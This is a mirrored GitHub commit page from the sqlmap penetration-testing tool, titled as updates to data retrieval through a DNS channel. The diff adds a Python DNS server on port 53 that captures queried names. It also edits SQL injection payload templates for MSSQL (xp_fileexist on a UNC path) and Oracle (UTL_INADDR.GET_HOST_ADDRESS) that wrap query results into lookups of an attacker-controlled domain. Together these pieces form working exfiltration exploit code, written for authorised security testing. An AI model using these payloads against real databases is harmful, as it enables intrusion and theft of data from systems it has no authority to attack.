Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 769b0d0

Browse files
stamparmstamparm
committed
more minor updates regarding data retrieval through DNS channel
1 parent 9199ce5 commit 769b0d0

3 files changed

Lines changed: 26 additions & 2 deletions

File tree

lib/request/dnsquery.py renamed to lib/request/dns.py

Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -7,6 +7,9 @@
77
See the file 'doc/COPYING' for copying permission
88
"""
99

10+
import socket
11+
import threading
12+
1013
class DNSQuery:
1114
"""
1215
Used for making fake DNS resolution responses based on received
@@ -42,3 +45,24 @@ def response(self, resolution):
4245
retval += "".join(chr(int(_)) for _ in resolution.split('.')) # 4 bytes of IP
4346

4447
return retval
48+
49+
class DNSServer:
50+
def __init__(self):
51+
self._requests = []
52+
53+
def run(self):
54+
def _():
55+
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
56+
s.bind(("", 53))
57+
58+
try:
59+
while True:
60+
data, addr = s.recvfrom(1024)
61+
_ = DNSQuery(data)
62+
s.sendto(_.response("127.0.0.1"), addr)
63+
self._requests.append(_._query)
64+
finally:
65+
s.close()
66+
67+
thread = threading.Thread(target=_)
68+
thread.start()

procs/mssqlserver/dns_request.txt

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,3 @@
11
DECLARE @host varchar(1024);
2-
SELECT @host = (%QUERY%) + '.%DOMAIN%';
2+
SELECT @host = '%PREFIX%' + (%QUERY%) + '%SUFFIX%' + '.%DOMAIN%';
33
EXEC('xp_fileexist "\' + @host + 'c$boot.ini"');

procs/oracle/dns_request.txt

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1 +1 @@
1-
SELECT UTL_INADDR.GET_HOST_ADDRESS((%QUERY%)||%DOMAIN%) FROM DUAL
1+
SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%'||(%QUERY%)||'%SUFFIX%'||'.%DOMAIN%') FROM DUAL

0 commit comments

Comments
 (0)